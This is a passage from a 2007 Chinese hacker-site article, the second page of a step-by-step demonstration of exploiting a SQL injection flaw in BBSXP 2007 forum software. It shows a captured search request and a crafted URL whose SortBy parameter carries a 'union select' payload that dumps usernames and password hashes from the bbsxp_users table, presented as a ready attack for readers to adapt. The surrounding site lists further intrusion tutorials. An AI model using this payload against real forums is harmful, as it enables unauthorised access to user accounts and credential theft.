黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 文章正文
[组图]BBSXP 2007的漏洞利用演示
      ★★★★
BBSXP 2007的漏洞利用演示
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-7-11


然后点“搜索”,搜索一下刚才的帖子。如图二:

这时候进行抓包。抓包后的结果:
POST /bbsxp/Search.asp?menu=Result HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.106/bbsxp/Search.asp?ForumID=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.1.106
Content-Length: 79
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E111%3C/option%3E; Themes=default; ASPSESSIONIDQCSBDDCT=HMIHPBPADLHDJPLCKOHKJBMM; Invisible=0; UserID=2; Userpass=7C4A8D09CA3762AF61E59520943DC26494F8941B

Keywords=test&Item=Topic&DateComparer=365&SortBy=Desc&ForumID=1&VerifyCode=9915
 
好了,这时候,我们就可以自行构造了,比如我构造如下语句:
以下是引用片段:
http://192.168.1.106/bbsxp/Search.asp?menu=Result&Keywords=test&Item=Topic&DateComparer=365&SortBy=Desc%20union%20select%201,1,1,1,userpass,username,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20[bbsxp_users]%20order%20by%20ThreadID&ForumID=1&VerifyCode=9915


就会出现如图三的效果:

相信大家看的很明显了,立刻暴出了用户名和相对应的密码。当然大家可以自行构造自己想要的语句,这里有两个问题没有解决:
一个就是BBSXP的40位加密问题、另外一个就是我说的是在极端条件下的注入方法,具体怎么饶过这个CHR(32)还在研究中,不知道是头脑发热还是没睡醒,既然BCT发布出来了,就一定有他的理由。

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    BBSXP 2007的漏洞利用演示07-11
    动网8.0最新漏洞07-11
    LBS blog又一注射漏洞含漏洞解析07-04
    BBSxp 2007 注射漏洞07-02
    淘宝taobao 跨站 XSS 漏洞06-29
    LBS blog sql注射漏洞(统杀所有版06-29
    最新QQ 163 126 等邮箱跨站挂马代06-18
    入侵清华大学全过程06-14
    入侵复旦大学06-14
    Ajax时代 SQL注入依然存在06-13
    PJblog跨站漏洞利用及修补06-11
    从注入到拿WEBSHELL(BBSXP7 mssq06-11
    相 关 文 章
  • 动网8.0最新漏洞

  • 利用校内网XSS漏洞更改访问量

  • BBSxp 2007 注射漏洞

  • 淘宝taobao 跨站 XSS 漏洞

  • LBS blog sql注射漏洞(统杀所有版本)

  • PHPWind-附件文件名跨站脚本漏洞

  • CGI漏洞精典汇总

  • apache文件名解析缺陷漏洞利用

  • 腾讯QQ聊天窗口漏洞安全测试报告

  • phpwind、DZ论坛XSS跨站漏洞0DAY

  • PJblog跨站漏洞利用及修补

  • 新云网站管理系统UpdateUserToday过程参

  • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886